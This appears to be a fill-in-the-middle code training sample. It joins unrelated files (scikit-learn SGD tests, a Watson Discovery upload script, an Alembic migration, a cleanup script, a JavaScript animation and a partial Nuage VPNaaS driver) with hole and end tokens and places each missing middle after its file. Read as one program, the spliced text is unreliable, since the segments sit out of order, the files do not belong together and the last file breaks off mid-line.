2], [3, 2]]) true_result = [1, 2, 2] # test sample 2; string class labels X2 = np.array([[-1, 1], [-0.75, 0.5], [-1.5, 1.5], [1, 1], [0.75, 0.5], [1.5, 1.5], [-1, -1], [0, -0.5], [1, -1]]) Y2 = ["one"] * 3 + ["two"] * 3 + ["three"] * 3 T2 = np.array([[-1.5, 0.5], [1, 2], [0, -2]]) true_result2 = ["one", "two", "three"] # test sample 3 X3 = np.array([[1, 1, 0, 0, 0, 0], [1, 1, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 1, 1], [0, 0, 0, 0, 1, 1], [0, 0, 0, 1, 0, 0], [0, 0, 0, 1, 0, 0]]) Y3 = np.array([1, 1, 1, 1, 2, 2, 2, 2]) # test sample 4 - two more or less redundent feature groups X4 = np.array([[1, 0.9, 0.8, 0, 0, 0], [1, .84, .98, 0, 0, 0], [1, .96, .88, 0, 0, 0], [1, .91, .99, 0, 0, 0], [0, 0, 0, .89, .91, 1], [0, 0, 0, .79, .84, 1], [0, 0, 0, .91, .95, 1], [0, 0, 0, .93, 1, 1]]) Y4 = np.array([1, 1, 1, 1, 2, 2, 2, 2]) iris = datasets.load_iris() # test sample 5 - test sample 1 as binary classification problem X5 = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]) Y5 = [1, 1, 1, 2, 2, 2] true_result5 = [0, 1, 1] ## ## Classification Test Case ## class CommonTest(object): def _test_warm_start(self, X, Y, lr): # Test that explicit warm restart... clf = self.factory(alpha=0.01, eta0=0.01, n_iter=5, shuffle=False, learning_rate=lr) clf.fit(X, Y) clf2 = self.factory(alpha=0.001, eta0=0.01, n_iter=5, shuffle=False, learning_rate=lr) clf2.fit(X, Y, coef_init=clf.coef_.copy(), intercept_init=clf.intercept_.copy()) #... and implicit warm restart are equivalent. clf3 = self.factory(alpha=0.01, eta0=0.01, n_iter=5, shuffle=False, warm_start=True, learning_rate=lr) clf3.fit(X, Y) assert_equal(clf3.t_, clf.t_) assert_array_almost_equal(clf3.coef_, clf.coef_) clf3.set_params(alpha=0.001) clf3.fit(X, Y) assert_equal(clf3.t_, clf2.t_) assert_array_almost_equal(clf3.coef_, clf2.coef_) def test_warm_start_constant(self): self._test_warm_start(X, Y, "constant") def test_warm_start_invscaling(self): self._test_warm_start(X, Y, "invscaling") def test_warm_start_optimal(self): self._test_warm_start(X, Y, "optimal") def test_input_format(self): """Input format tests. """ clf = self.factory(alpha=0.01, n_iter=5, shuffle=False) clf.fit(X, Y) Y_ = np.array(Y)[:, np.newaxis] Y_ = np.c_[Y_, Y_] assert_raises(ValueError, clf.fit, X, Y_) def test_clone(self): """Test whether clone works ok. """ clf = self.factory(alpha=0.01, n_iter=5, penalty='l1') clf = clone(clf) clf.set_params(penalty='l2') clf.fit(X, Y) clf2 = self.factory(alpha=0.01, n_iter=5, penalty='l2') clf2.fit(X, Y) assert_array_equal(clf.coef_, clf2.coef_) class DenseSGDClassifierTestCase(unittest.TestCase, CommonTest): """Test suite for the dense representation variant of SGD""" factory = SGDClassifier def test_sgd(self): """Check that SGD gives any results :-)""" for loss in ("hinge", "squared_hinge", "log", "modified_huber"): clf = self.factory(penalty='l2', alpha=0.01, fit_intercept=True, loss=loss, n_iter=10, shuffle=True) clf.fit(X, Y) #assert_almost_equal(clf.coef_[0], clf.coef_[1], decimal=7) assert_array_equal(clf.predict(T), true_result) @raises(ValueError) def test_sgd_bad_l1_ratio(self): """Check whether expected ValueError on bad l1_ratio""" self.factory(l1_ratio=1.1) @raises(ValueError) def test_sgd_bad_learning_rate_schedule(self): """Check whether expected ValueError on bad learning_rate""" self.factory(learning_rate="<unknown>") @raises(ValueError) def test_sgd_bad_eta0(self): """Check whether expected ValueError on bad eta0""" self.factory(eta0=0, learning_rate="constant") @raises(ValueError) def test_sgd_bad_alpha(self): """Check whether expected ValueError on bad alpha""" self.factory(alpha=-.1) @raises(ValueError) def test_sgd_bad_penalty(self): """Check whether expected ValueError on bad penalty""" self.factory(penalty='foobar', l1_ratio=0.85) @raises(ValueError) def test_sgd_bad_loss(self): """Check whether expected ValueError on bad loss""" self.factory(loss="foobar") @raises(ValueError) def test_sgd_n_iter_param(self): """Test parameter validity check""" self.factory(n_iter=-10000) @raises(ValueError) def test_sgd_shuffle_param(self): """Test parameter validity check""" self.factory(shuffle="false") @raises(TypeError) def test_argument_coef(self): """Checks coef_init not allowed as model argument (only fit)""" # Provided coef_ does not match dataset. self.factory(coef_init=np.zeros((3,))).fit(X, Y) @raises(ValueError) def test_provide_coef(self): """Checks coef_init shape for the warm starts""" # Provided coef_ does not match dataset. self.factory().fit(X, Y, coef_init=np.zeros((3,))) @raises(ValueError) def test_set_intercept(self): """Checks intercept_ shape for the warm starts""" # Provided intercept_ does not match dataset. self.factory().fit(X, Y, intercept_init=np.zeros((3,))) def test_set_intercept_binary(self): """Checks intercept_ shape for the warm starts in binary case""" self.factory().fit(X5, Y5, intercept_init=0) def test_set_intercept_to_intercept(self): """Checks intercept_ shape consistency for the warm starts""" # Inconsistent intercept_ shape. clf = self.factory().fit(X5, Y5) self.factory().fit(X5, Y5, intercept_init=clf.intercept_) clf = self.factory().fit(X, Y) self.factory().fit(X, Y, intercept_init=clf.intercept_) @raises(ValueError) def test_sgd_at_least_two_labels(self): """Target must have at least two labels""" self.factory(alpha=0.01, n_iter=20).fit(X2, np.ones(9)) def test_sgd_multiclass(self): """Multi-class test case""" clf = self.factory(alpha=0.01, n_iter=20).fit(X2, Y2) assert_equal(clf.coef_.shape, (3, 2)) assert_equal(clf.intercept_.shape, (3,)) assert_equal(clf.decision_function([0, 0]).shape, (1, 3)) pred = clf.predict(T2) assert_array_equal(pred, true_result2) def test_sgd_multiclass_with_init_coef(self): """Multi-class test case""" clf = self.factory(alpha=0.01, n_iter=20) clf.fit(X2, Y2, coef_init=np.zeros((3, 2)), intercept_init=np.zeros(3)) assert_equal(clf.coef_.shape, (3, 2)) assert_true(clf.intercept_.shape, (3,)) pred = clf.predict(T2) assert_array_equal(pred, true_result2) def test_sgd_multiclass_njobs(self): """Multi-class test case with multi-core support""" clf = self.factory(alpha=0.01, n_iter=20, n_jobs=2).fit(X2, Y2) assert_equal(clf.coef_.shape, (3, 2)) assert_equal(clf.intercept_.shape, (3,)) assert_equal(clf.decision_function([0, 0]).shape, (1, 3)) pred = clf.predict(T2) assert_array_equal(pred, true_result2) def test_set_coef_multiclass(self): """Checks coef_init and intercept_init shape for for multi-class problems""" # Provided coef_ does not match dataset clf = self.factory() assert_raises(ValueError, clf.fit, X2, Y2, coef_init=np.zeros((2, 2))) # Provided coef_ does match dataset clf = self.factory().fit(X2, Y2, coef_init=np.zeros((3, 2))) # Provided intercept_ does not match dataset clf = self.factory() assert_raises(ValueError, clf.fit, X2, Y2, intercept_init=np.zeros((1,))) # Provided intercept_ does match dataset. clf = self.factory().fit(X2, Y2, intercept_init=np.zeros((3,))) def test_sgd_proba(self): """Check SGD.predict_proba""" # hinge loss does not allow for conditional prob estimate clf = self.factory(loss="hinge", alpha=0.01, n_iter=10).fit(X, Y) assert_raises(NotImplementedError, clf.predict_proba, [3, 2]) # log and modified_huber losses can output probability estimates # binary case for loss in ["log", "modified_huber"]: clf = self.factory(loss="modified_huber", alpha=0.01, n_iter=10) clf.fit(X, Y) p = clf.predict_proba([3, 2]) assert_true(p[0, 1] > 0.5) p = clf.predict_proba([-1, -1]) assert_true(p[0, 1] < 0.5) p = clf.predict_log_proba([3, 2]) assert_true(p[0, 1] > p[0, 0]) p = clf.predict_log_proba([-1, -1]) assert_true(p[0, 1] < p[0, 0]) # log loss multiclass probability estimates clf = self.factory(loss="log", alpha=0.01, n_iter=10).fit(X2, Y2) d = clf.decision_function([[.1, -.1], [.3, .2]]) p = clf.predict_proba([[.1, -.1], [.3, .2]]) assert_array_equal(np.argmax(p, axis=1), np.argmax(d, axis=1)) assert_almost_equal(p[0].sum(), 1) assert_true(np.all(p[0] >= 0)) p = clf.predict_proba([-1, -1]) d = clf.decision_function([-1, -1]) assert_array_equal(np.argsort(p[0]), np.argsort(d[0])) l = clf.predict_log_proba([3, 2]) p = clf.predict_proba([3, 2]) assert_array_almost_equal(np.log(p), l) l = clf.predict_log_proba([-1, -1]) p = clf.predict_proba([-1, -1]) assert_array_almost_equal(np.log(p), l) # Modified Huber multiclass probability estimates; requires a separate # test because the hard zero/one probabilities may destroy the # ordering present in decision_function output. clf = self.factory(loss="modified_huber", alpha=0.01, n_iter=10) clf.fit(X2, Y2) d = clf.decision_function([3, 2]) p = clf.predict_proba([3, 2]) if not isinstance(self, SparseSGDClassifierTestCase): assert_equal(np.argmax(d, axis=1), np.argmax(p, axis=1))<|fim▁hole|> # the following sample produces decision_function values < -1, # which would cause naive normalization to fail (see comment # in SGDClassifier.predict_proba) x = X.mean(axis=0) d = clf.decision_function(x) if np.all(d < -1): # XXX not true in sparse test case (why?) p = clf.predict_proba(x) assert_array_almost_equal(p[0], [1/3.] * 3) def test_sgd_l1(self): """Test L1 regularization""" n = len(X4) rng = np.random.RandomState(13) idx = np.arange(n) rng.shuffle(idx) X = X4[idx, :] Y = Y4[idx] clf = self.factory(penalty='l1', alpha=.2, fit_intercept=False, n_iter=2000) clf.fit(X, Y) assert_array_equal(clf.coef_[0, 1:-1], np.zeros((4,))) pred = clf.predict(X) assert_array_equal(pred, Y) # test sparsify with dense inputs clf.sparsify() assert_true(sp.issparse(clf.coef_)) pred = clf.predict(X) assert_array_equal(pred, Y) # pickle and unpickle with sparse coef_ clf = pickle.loads(pickle.dumps(clf)) assert_true(sp.issparse(clf.coef_)) pred = clf.predict(X) assert_array_equal(pred, Y) def test_class_weights(self): """ Test class weights. """ X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0], [1.0, 1.0], [1.0, 0.0]]) y = [1, 1, 1, -1, -1] clf = self.factory(alpha=0.1, n_iter=1000, fit_intercept=False, class_weight=None) clf.fit(X, y) assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([1])) # we give a small weights to class 1 clf = self.factory(alpha=0.1, n_iter=1000, fit_intercept=False, class_weight={1: 0.001}) clf.fit(X, y) # now the hyperplane should rotate clock-wise and # the prediction on this point should shift assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([-1])) def test_equal_class_weight(self): """Test if equal class weights approx. equals no class weights. """ X = [[1, 0], [1, 0], [0, 1], [0, 1]] y = [0, 0, 1, 1] clf = self.factory(alpha=0.1, n_iter=1000, class_weight=None) clf.fit(X, y) X = [[1, 0], [0, 1]] y = [0, 1] clf_weighted = self.factory(alpha=0.1, n_iter=1000, class_weight={0: 0.5, 1: 0.5}) clf_weighted.fit(X, y) # should be similar up to some epsilon due to learning rate schedule assert_almost_equal(clf.coef_, clf_weighted.coef_, decimal=2) @raises(ValueError) def test_wrong_class_weight_label(self): """ValueError due to not existing class label.""" clf = self.factory(alpha=0.1, n_iter=1000, class_weight={0: 0.5}) clf.fit(X, Y) @raises(ValueError) def test_wrong_class_weight_format(self): """ValueError due to wrong class_weight argument type.""" clf = self.factory(alpha=0.1, n_iter=1000, class_weight=[0.5]) clf.fit(X, Y) def test_auto_weight(self): """Test class weights for imbalanced data""" # compute reference metrics on iris dataset that is quite balanced by # default X, y = iris.data, iris.target X = scale(X) idx = np.arange(X.shape[0]) rng = np.random.RandomState(0) rng.shuffle(idx) X = X[idx] y = y[idx] clf = self.factory(alpha=0.0001, n_iter=1000, class_weight=None).fit(X, y) assert_almost_equal(metrics.f1_score(y, clf.predict(X)), 0.96, decimal=1) # make the same prediction using automated class_weight clf_auto = self.factory(alpha=0.0001, n_iter=1000, class_weight="auto").fit(X, y) assert_almost_equal(metrics.f1_score(y, clf_auto.predict(X)), 0.96, decimal=1) # Make sure that in the balanced case it does not change anything # to use "auto" assert_array_almost_equal(clf.coef_, clf_auto.coef_, 6) # build an very very imbalanced dataset out of iris data X_0 = X[y == 0, :] y_0 = y[y == 0] X_imbalanced = np.vstack([X] + [X_0] * 10) y_imbalanced = np.concatenate([y] + [y_0] * 10) # fit a model on the imbalanced data without class weight info clf = self.factory(n_iter=1000, class_weight=None) clf.fit(X_imbalanced, y_imbalanced) y_pred = clf.predict(X) assert_less(metrics.f1_score(y, y_pred), 0.96) # fit a model with auto class_weight enabled clf = self.factory(n_iter=1000, class_weight="auto") clf.fit(X_imbalanced, y_imbalanced) y_pred = clf.predict(X) assert_greater(metrics.f1_score(y, y_pred), 0.96) # fit another using a fit parameter override clf = self.factory(n_iter=1000, class_weight="auto") clf.fit(X_imbalanced, y_imbalanced) y_pred = clf.predict(X) assert_greater(metrics.f1_score(y, y_pred), 0.96) def test_sample_weights(self): """Test weights on individual samples""" X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0], [1.0, 1.0], [1.0, 0.0]]) y = [1, 1, 1, -1, -1] clf = self.factory(alpha=0.1, n_iter=1000, fit_intercept=False) clf.fit(X, y) assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([1])) # we give a small weights to class 1 clf.fit(X, y, sample_weight=[0.001] * 3 + [1] * 2) # now the hyperplane should rotate clock-wise and # the prediction on this point should shift assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([-1])) @raises(ValueError) def test_wrong_sample_weights(self): """Test if ValueError is raised if sample_weight has wrong shape""" clf = self.factory(alpha=0.1, n_iter=1000, fit_intercept=False) # provided sample_weight too long clf.fit(X, Y, sample_weight=np.arange(7)) @raises(ValueError) def test_partial_fit_exception(self): clf = self.factory(alpha=0.01) # classes was not specified clf.partial_fit(X3, Y3) def test_partial_fit_binary(self): third = X.shape[0] // 3 clf = self.factory(alpha=0.01) classes = np.unique(Y) clf.partial_fit(X[:third], Y[:third], classes=classes) assert_equal(clf.coef_.shape, (1, X.shape[1])) assert_equal(clf.intercept_.shape, (1,)) assert_equal(clf.decision_function([0, 0]).shape, (1, )) id1 = id(clf.coef_.data) clf.partial_fit(X[third:], Y[third:]) id2 = id(clf.coef_.data) # check that coef_ haven't been re-allocated assert_true(id1, id2) y_pred = clf.predict(T) assert_array_equal(y_pred, true_result) def test_partial_fit_multiclass(self): third = X2.shape[0] // 3 clf = self.factory(alpha=0.01) classes = np.unique(Y2) clf.partial_fit(X2[:third], Y2[:third], classes=classes) assert_equal(clf.coef_.shape, (3, X2.shape[1])) assert_equal(clf.intercept_.shape, (3,)) assert_equal(clf.decision_function([0, 0]).shape, (1, 3)) id1 = id(clf.coef_.data) clf.partial_fit(X2[third:], Y2[third:]) id2 = id(clf.coef_.data) # check that coef_ haven't been re-allocated assert_true(id1, id2) def test_fit_then_partial_fit(self): """Partial_fit should work after initial fit in the multiclass case. Non-regression test for #2496; fit would previously produce a Fortran-ordered coef_ that subsequent partial_fit couldn't handle. """ clf = self.factory() clf.fit(X2, Y2) clf.partial_fit(X2, Y2) # no exception here def _test_partial_fit_equal_fit(self, lr): for X_, Y_, T_ in ((X, Y, T), (X2, Y2, T2)): clf = self.factory(alpha=0.01, eta0=0.01, n_iter=2, learning_rate=lr, shuffle=False) clf.fit(X_, Y_) y_pred = clf.decision_function(T_) t = clf.t_ classes = np.unique(Y_) clf = self.factory(alpha=0.01, eta0=0.01, learning_rate=lr, shuffle=False) for i in range(2): clf.partial_fit(X_, Y_, classes=classes) y_pred2 = clf.decision_function(T_) assert_equal(clf.t_, t) assert_array_almost_equal(y_pred, y_pred2, decimal=2) def test_partial_fit_equal_fit_constant(self): self._test_partial_fit_equal_fit("constant") def test_partial_fit_equal_fit_optimal(self): self._test_partial_fit_equal_fit("optimal") def test_partial_fit_equal_fit_invscaling(self): self._test_partial_fit_equal_fit("invscaling") def test_regression_losses(self): clf = self.factory(alpha=0.01, learning_rate="constant", eta0=0.1, loss="epsilon_insensitive") clf.fit(X, Y) assert_equal(1.0, np.mean(clf.predict(X) == Y)) clf = self.factory(alpha=0.01, learning_rate="constant", eta0=0.1, loss="squared_epsilon_insensitive") clf.fit(X, Y) assert_equal(1.0, np.mean(clf.predict(X) == Y)) clf = self.factory(alpha=0.01, loss="huber") clf.fit(X, Y) assert_equal(1.0, np.mean(clf.predict(X) == Y)) clf = self.factory(alpha=0.01, learning_rate="constant", eta0=0.01, loss="squared_loss") clf.fit(X, Y) assert_equal(1.0, np.mean(clf.predict(X) == Y)) def test_warm_start_multiclass(self): self._test_warm_start(X2, Y2, "optimal") def test_multiple_fit(self): """Test multiple calls of fit w/ different shaped inputs.""" clf = self.factory(alpha=0.01, n_iter=5, shuffle=False) clf.fit(X, Y) assert_true(hasattr(clf, "coef_")) # Non-regression test: try fitting with a different label set. y = [["ham", "spam"][i] for i in LabelEncoder().fit_transform(Y)] clf.fit(X[:, :-1], y) class SparseSGDClassifierTestCase(DenseSGDClassifierTestCase): """Run exactly the same tests using the sparse representation variant""" factory = SparseSGDClassifier ############################################################################### # Regression Test Case class DenseSGDRegressorTestCase(unittest.TestCase, CommonTest): """Test suite for the dense representation variant of SGD""" factory = SGDRegressor def test_sgd(self): """Check that SGD gives any results.""" clf = self.factory(alpha=0.1, n_iter=2, fit_intercept=False) clf.fit([[0, 0], [1, 1], [2, 2]], [0, 1, 2]) assert_equal(clf.coef_[0], clf.coef_[1]) @raises(ValueError) def test_sgd_bad_penalty(self): """Check whether expected ValueError on bad penalty""" self.factory(penalty='foobar', l1_ratio=0.85) @raises(ValueError) def test_sgd_bad_loss(self): """Check whether expected ValueError on bad loss""" self.factory(loss="foobar") def test_sgd_least_squares_fit(self): xmin, xmax = -5, 5 n_samples = 100 rng = np.random.RandomState(0) X = np.linspace(xmin, xmax, n_samples).reshape(n_samples, 1) # simple linear function without noise y = 0.5 * X.ravel() clf = self.factory(loss='squared_loss', alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_greater(score, 0.99) # simple linear function with noise y = 0.5 * X.ravel() + rng.randn(n_samples, 1).ravel() clf = self.factory(loss='squared_loss', alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_greater(score, 0.5) def test_sgd_epsilon_insensitive(self): xmin, xmax = -5, 5 n_samples = 100 X = np.linspace(xmin, xmax, n_samples).reshape(n_samples, 1) # simple linear function without noise y = 0.5 * X.ravel() clf = self.factory(loss='epsilon_insensitive', epsilon=0.01, alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_true(score > 0.99) # simple linear function with noise y = 0.5 * X.ravel() \ + np.random.randn(n_samples, 1).ravel() clf = self.factory(loss='epsilon_insensitive', epsilon=0.01, alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_true(score > 0.5) def test_sgd_huber_fit(self): xmin, xmax = -5, 5 n_samples = 100 rng = np.random.RandomState(0) X = np.linspace(xmin, xmax, n_samples).reshape(n_samples, 1) # simple linear function without noise y = 0.5 * X.ravel() clf = self.factory(loss="huber", epsilon=0.1, alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_greater(score, 0.99) # simple linear function with noise y = 0.5 * X.ravel() + rng.randn(n_samples, 1).ravel() clf = self.factory(loss="huber", epsilon=0.1, alpha=0.1, n_iter=20, fit_intercept=False) clf.fit(X, y) score = clf.score(X, y) assert_greater(score, 0.5) def test_elasticnet_convergence(self): """Check that the SGD output is consistent with coordinate descent""" n_samples, n_features = 1000, 5 rng = np.random.RandomState(0) X = np.random.randn(n_samples, n_features) # ground_truth linear model that generate y from X and to which the # models should converge if the regularizer would be set to 0.0 ground_truth_coef = rng.randn(n_features) y = np.dot(X, ground_truth_coef) # XXX: alpha = 0.1 seems to cause convergence problems for alpha in [0.01, 0.001]: for l1_ratio in [0.5, 0.8, 1.0]: cd = linear_model.ElasticNet(alpha=alpha, l1_ratio=l1_ratio, fit_intercept=False) cd.fit(X, y) sgd = self.factory(penalty='elasticnet', n_iter=50, alpha=alpha, l1_ratio=l1_ratio, fit_intercept=False) sgd.fit(X, y) err_msg = ("cd and sgd did not converge to comparable " "results for alpha=%f and l1_ratio=%f" % (alpha, l1_ratio)) assert_almost_equal(cd.coef_, sgd.coef_, decimal=2, err_msg=err_msg) def test_partial_fit(self): third = X.shape[0] // 3 clf = self.factory(alpha=0.01) clf.partial_fit(X[:third], Y[:third]) assert_equal(clf.coef_.shape, (X.shape[1], )) assert_equal(clf.intercept_.shape, (1,)) assert_equal(clf.decision_function([0, 0]).shape, (1, )) id1 = id(clf.coef_.data) clf.partial_fit(X[third:], Y[third:]) id2 = id(clf.coef_.data) # check that coef_ haven't been re-allocated assert_true(id1, id2) def _test_partial_fit_equal_fit(self, lr): clf = self.factory(alpha=0.01, n_iter=2, eta0=0.01, learning_rate=lr, shuffle=False) clf.fit(X, Y) y_pred = clf.predict(T) t = clf.t_ clf = self.factory(alpha=0.01, eta0=0.01, learning_rate=lr, shuffle=False) for i in range(2): clf.partial_fit(X, Y) y_pred2 = clf.predict(T) assert_equal(clf.t_, t) assert_array_almost_equal(y_pred, y_pred2, decimal=2) def test_partial_fit_equal_fit_constant(self): self._test_partial_fit_equal_fit("constant") def test_partial_fit_equal_fit_optimal(self): self._test_partial_fit_equal_fit("optimal") def test_partial_fit_equal_fit_invscaling(self): self._test_partial_fit_equal_fit("invscaling") def test_loss_function_epsilon(self): clf = self.factory(epsilon=0.9) clf.set_params(epsilon=0.1) assert clf.loss_functions['huber'][1] == 0.1 class SparseSGDRegressorTestCase(DenseSGDRegressorTestCase): """Run exactly the same tests using the sparse representation variant""" factory = SparseSGDRegressor def test_l1_ratio(): """Test if l1 ratio extremes match L1 and L2 penalty settings. """ X, y = datasets.make_classification(n_samples=1000, n_features=100, n_informative=20, random_state=1234) # test if elasticnet with l1_ratio near 1 gives same result as pure l1 est_en = SGDClassifier(alpha=0.001, penalty='elasticnet', l1_ratio=0.9999999999).fit(X, y) est_l1 = SGDClassifier(alpha=0.001, penalty='l1').fit(X, y) assert_array_almost_equal(est_en.coef_, est_l1.coef_) # test if elasticnet with l1_ratio near 0 gives same result as pure l2 est_en = SGDClassifier(alpha=0.001, penalty='elasticnet', l1_ratio=0.0000000001).fit(X, y) est_l2 = SGDClassifier(alpha=0.001, penalty='l2').fit(X, y) assert_array_almost_equal(est_en.coef_, est_l2.coef_)<|fim▁end|>
else: # XXX the sparse test gets a different X2 (?) assert_equal(np.argmin(d, axis=1), np.argmin(p, axis=1))
<|file_name|>upload_training_data.py<|end_file_name|><|fim▁begin|>import json import os import glob import sys import logging from watson_developer_cloud import WatsonException if '__file__' in globals(): sys.path.insert(0, os.path.join(os.path.abspath(__file__), 'scripts')) else: sys.path.insert(0, os.path.join(os.path.abspath(os.getcwd()), 'scripts')) from discovery_setup_utils import ( # noqa discovery, curdir, get_constants, write_progress ) # set the DATA_TYPE the same to what was downloaded DATA_TYPE = 'travel' # set the TRAINING_PATH to the location of the training data relative # to the 'data' directory # by default, evaluates to <DATA_TYPE>/training TRAINING_PATH = os.path.join(DATA_TYPE, 'training') DATA_DIRECTORY = os.path.abspath(os.path.join(curdir, '..', 'data')) TRAINING_DIRECTORY = os.path.join(DATA_DIRECTORY, TRAINING_PATH) LOG_FILE_PATH = os.path.join(DATA_DIRECTORY, 'training_upload.log') logging.basicConfig(filename=LOG_FILE_PATH, filemode='w', format='%(asctime)s %(levelname)s: %(message)s', level=logging.INFO) def upload_training_doc(training_json, environment_id, collection_id): try: r = discovery.add_training_data_query( environment_id=environment_id, collection_id=collection_id, natural_language_query=training_json['natural_language_query'], examples=training_json['examples']) logging.info("Response:\n%s", json.dumps(r, indent=4)) except WatsonException as exception: logging.error(exception) def upload_training_data(training_directory): print("Training directory: %s" % training_directory)<|fim▁hole|> training_data_uploaded = 0 done_percent = 0 write_progress(training_data_uploaded, total_files) for file in files: with open(file, 'rb') as file_object: logging.info("Processing file: %s", file_object.name) upload_training_doc( json.loads(file_object.read()), discovery_constants['environment_id'], discovery_constants['collection_id']['trained'] ) training_data_uploaded += 1 done_percent = write_progress(training_data_uploaded, total_files, done_percent) logging.info("Finished uploading %d files", total_files) print("\nFinished uploading %d files" % total_files) print('Retrieving environment and collection constants...') """ retrieve the following: { environment_id: env_id, collection_id: { trained: trained_id } } """ discovery_constants = get_constants( discovery, trained_name=os.getenv( 'DISCOVERY_TRAINED_COLLECTION_NAME', 'knowledge_base_trained' ) ) print('Constants retrieved!') print(discovery_constants) print("Log file located at: %s" % LOG_FILE_PATH) upload_training_data(TRAINING_DIRECTORY)<|fim▁end|>
files = glob.glob(os.path.join(training_directory, '*.json')) total_files = len(files) print("Number of files to process: %d" % total_files)
<|file_name|>424f18f4c1df_.py<|end_file_name|><|fim▁begin|>"""empty message Revision ID: 424f18f4c1df Revises: 106e3631fe9 Create Date: 2015-06-23 11:31:08.548661 """ # revision identifiers, used by Alembic. revision = '424f18f4c1df' down_revision = '106e3631fe9' from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import postgresql from sqlalchemy.dialects.postgresql import ENUM providers_list = ENUM('facebook', 'twitter', 'truenth', name='providers', create_type=False) def upgrade(): ### commands auto generated by Alembic - please adjust! ### providers_list.create(op.get_bind(), checkfirst=False) op.create_table('auth_providers', sa.Column('id', sa.Integer(), nullable=False), sa.Column('provider', providers_list, nullable=True), sa.Column('provider_id', sa.Integer(), nullable=True), sa.Column('user_id', sa.Integer(), nullable=True), sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),<|fim▁hole|> def downgrade(): ### commands auto generated by Alembic - please adjust! ### op.drop_table('auth_providers') providers_list.drop(op.get_bind(), checkfirst=False) ### end Alembic commands ###<|fim▁end|>
sa.PrimaryKeyConstraint('id') ) ### end Alembic commands ###
<|file_name|>database_cleanup.py<|end_file_name|><|fim▁begin|>from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker import os import sys import json import re import uuid import base64 import models from models.movie_trailer_model import Base, MovieTrailerModel <|fim▁hole|> print("%d rows were deleted from table", rows)<|fim▁end|>
rows = models.delete_movie_trailers()
<|file_name|>animations.js<|end_file_name|><|fim▁begin|>import Chaffle from "chaffle"; const scrambleAuthor = () => { const elements = document.querySelectorAll("[data-chaffle]"); elements.forEach(el => { const chaffle = new Chaffle(el, { speed: 10,<|fim▁hole|> chaffle.init(); }); }); }; export { scrambleAuthor };<|fim▁end|>
delay: 20, }); el.addEventListener("mouseover", () => {
<|file_name|>driver.py<|end_file_name|><|fim▁begin|># Copyright 2016 Nuage Netowrks USA Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import abc import copy import os import oslo_messaging import six from neutron.agent.linux import ip_lib from neutron.common import rpc as n_rpc from neutron import context from neutron_lib import constants from neutron_lib.plugins import directory from neutron_vpnaas.services.vpn import device_drivers from neutron_vpnaas.services.vpn.device_drivers import fedora_strongswan_ipsec from neutron_vpnaas.services.vpn.device_drivers import ipsec from neutron_vpnaas.services.vpn.device_drivers import strongswan_ipsec from nuage_neutron.vpnaas.common import topics from nuage_neutron.vpnaas.nuage_interface import NuageInterfaceDriver from oslo_concurrency import lockutils from oslo_config import cfg from oslo_log import log as logging from oslo_service import loopingcall LOG = logging.getLogger(__name__) TEMPLATE_PATH = os.path.dirname(os.path.abspath(__file__)) IPSEC_CONNS = 'ipsec_site_connections' class NuageIPsecVpnDriverApi(object): """IPSecVpnDriver RPC api.""" def __init__(self, topic): target = oslo_messaging.Target(topic=topic, version='1.0') self.client = n_rpc.get_client(target) def get_vpn_services_on_host(self, context, host): """Get list of vpnservices. The vpnservices including related ipsec_site_connection, ikepolicy and ipsecpolicy on this host """ cctxt = self.client.prepare() return cctxt.call(context, 'get_vpn_services_on_host', host=host) def update_status(self, context, status): """Update local status. This method call updates status attribute of VPNServices. """ cctxt = self.client.prepare() return cctxt.call(context, 'update_status', status=status) @six.add_metaclass(abc.ABCMeta) class NuageIPsecDriver(device_drivers.DeviceDriver): def __init__(self, vpn_service, host): self.conf = vpn_service.conf self.host = host self.conn = n_rpc.create_connection(new=True) self.context = context.get_admin_context_without_session() self.topic = topics.NUAGE_IPSEC_AGENT_TOPIC self.processes = {} self.routers = {} self.process_status_cache = {} self.endpoints = [self] self.conn.create_consumer(self.topic, self.endpoints) self.conn.consume_in_threads() self.agent_rpc = NuageIPsecVpnDriverApi( topics.NUAGE_IPSEC_DRIVER_TOPIC) self.process_status_cache_check = loopingcall.FixedIntervalLoopingCall( self.report_status, self.context) self.process_status_cache_check.start( interval=20) self.nuage_if_driver = NuageInterfaceDriver(cfg.CONF) def _get_l3_plugin(self): return directory.get_plugin(constants.L3) def get_namespace(self, router_id): """Get namespace of router. :router_id: router_id :returns: namespace string. """ return 'vpn-' + router_id def vpnservice_updated(self, context, **kwargs): """Vpnservice updated rpc handler VPN Service Driver will call this method when vpnservices updated. Then this method start sync with server. """ router = kwargs.get('router', None) self.sync(context, [router] if router else []) def tracking(self, context, **kwargs): """Handling create router event. Agent calls this method, when the process namespace is ready. Note: process_id == router_id == vpnservice_id """ router = kwargs.get('router', None) process_id = router['id'] self.routers[process_id] = process_id if process_id in self.processes: # In case of vpnservice is created # before vpn service namespace process = self.processes[process_id] process.enable() def non_tracking(self, context, **kwargs): router = kwargs.get('router', None) process_id = router['id'] self.destroy_process(process_id) if process_id in self.routers: del self.routers[process_id] def ensure_process(self, process_id, vpnservice=None): """Ensuring process. If the process doesn't exist, it will create process and store it in self.processs """ process = self.processes.get(process_id) if not process or not process.namespace: namespace = 